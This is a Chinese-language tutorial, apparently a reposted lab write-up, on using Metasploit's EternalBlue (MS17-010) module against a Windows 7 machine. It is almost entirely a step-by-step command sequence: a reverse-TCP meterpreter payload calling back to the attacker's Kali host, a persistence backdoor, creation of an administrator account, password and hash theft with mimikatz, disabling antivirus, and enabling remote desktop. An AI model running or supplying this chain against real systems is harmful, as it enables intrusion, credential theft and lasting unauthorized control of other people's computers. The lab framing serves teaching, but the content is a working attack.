通过Metasploit利用MS17_010渗透新姿势
作者:互联网
实验环境:
靶机 Windows7 IP地址 192.168.1.109
攻击机:Kali Linux 2019 IP地址 192.168.1.110
实验步骤:
apt-get install wine 更新wine
wine cmd.exe 测试递归,然后输入exit推出即可
nmap -O -sV 192.168.1.109 扫描端口
service postgresql start 启动postgresql
msfconsole
search ms17_010 搜索ms17_010模块
use exploit/windows/smb/ms17_010_eternalblue 调用ms17_010模块
set RHOST 192.168.1.109 设置被攻击的主机
set payload windows/x64/meterpreter/reverse_tcp 选择payload
set LHOST 192.168.1.110 设置本机地址,注意这里的地址是你kali的地址
set LPORT 445 (和被攻击的端口相同,否则攻击失败)
run 开始攻
好了现在我们已经成功地入侵并且拿到了靶机的shell了,现在我们开始进行入侵后的深入利用了。我们现在拿到的只是这台靶机的临时使用权,那我们如果想下次再利用怎么办呢,那就需要我们在这台靶机里面安放后门方便下次使用,操作如下:
run persistence -U -A -i 10 - 8090 -r 192.168.1.110 (kali的ip) 生成后门方便下下次使用
如果我们要是用这台机器我们需要创建一个独立的用户来供我们自己使用并且顺便提升一下这个用户的权限
run getgui -u kali -p 123456 创建本地用户
提权
shell
net localgroup administrators kaliceshi /add
其实我们还可以获取靶机上原本就存在的账户的用户名和密码
getuid 提权
load mimikatz 加载模块
msv 获取密码哈希值
kerberos 获取明文密码
特殊情况使用
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
再或者查看靶机信息,运行时间,关闭杀毒软件和开启远程桌面服务等
sysinfo 查看系统信息
idletime 查看靶机运行时间
run post/windows/gather/checkvm 查看靶机运行的如理位置
run post/windows/manage/killav 关闭杀毒软件,由于我的靶机没有安装杀毒软件所以检测不到
run post/windows/manage/enable_rdp 开启远程桌面服务
文章转自:林三岁网络安全实验室
转载请注明出处:https://bbs.linsansui.cn/forum.php?mod=viewthread&tid=13&extra=page%3D1
标签:Metasploit,set,run,windows,192.168,010,MS17,靶机 来源: https://blog.csdn.net/weixin_44255593/article/details/113061993